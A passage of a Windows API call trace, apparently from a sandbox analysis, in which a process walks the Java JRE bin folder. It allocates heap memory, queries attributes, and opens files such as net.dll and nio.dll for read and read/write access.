0x88748 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.479] AreFileApisANSI () returned 1 [0093.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0093.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 52 [0093.479] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0)) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.479] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="net.dll", cAlternateFileName="")) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0093.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0093.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0093.480] AreFileApisANSI () returned 1 [0093.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll", lpUsedDefaultChar=0x0) returned 47 [0093.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.480] AreFileApisANSI () returned 1 [0093.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0093.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 47 [0093.480] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.481] GetFileType (hFile=0x360) returned 0x1 [0093.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0093.481] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.481] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.481] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.481] CloseHandle (hObject=0x360) returned 1 [0093.482] AreFileApisANSI () returned 1 [0093.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0093.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 47 [0093.482] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.482] GetFileType (hFile=0x360) returned 0x1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0093.482] CloseHandle (hObject=0x360) returned 1 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.482] AreFileApisANSI () returned 1 [0093.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0093.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 47 [0093.483] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17a40)) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xec40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nio.dll", cAlternateFileName="")) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0093.483] AreFileApisANSI () returned 1 [0093.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll", lpUsedDefaultChar=0x0) returned 47 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.484] AreFileApisANSI () returned 1 [0093.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0093.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 47 [0093.484] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.484] GetFileType (hFile=0x360) returned 0x1 [0093.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.484] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.484] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.484] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.485] CloseHandle (hObject=0x360) returned 1 [0093.485] AreFileApisANSI () returned 1 [0093.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0093.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 47 [0093.485] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.485] GetFileType (hFile=0x360) returned 0x1 [0093.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0093.485] CloseHandle (hObject=0x360) returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.486] AreFileApisANSI () returned 1 [0093.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0093.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 47 [0093.486] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xec40)) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="npt.dll", cAlternateFileName="")) returned 1 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.487] AreFileApisANSI () returned 1 [0093.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, 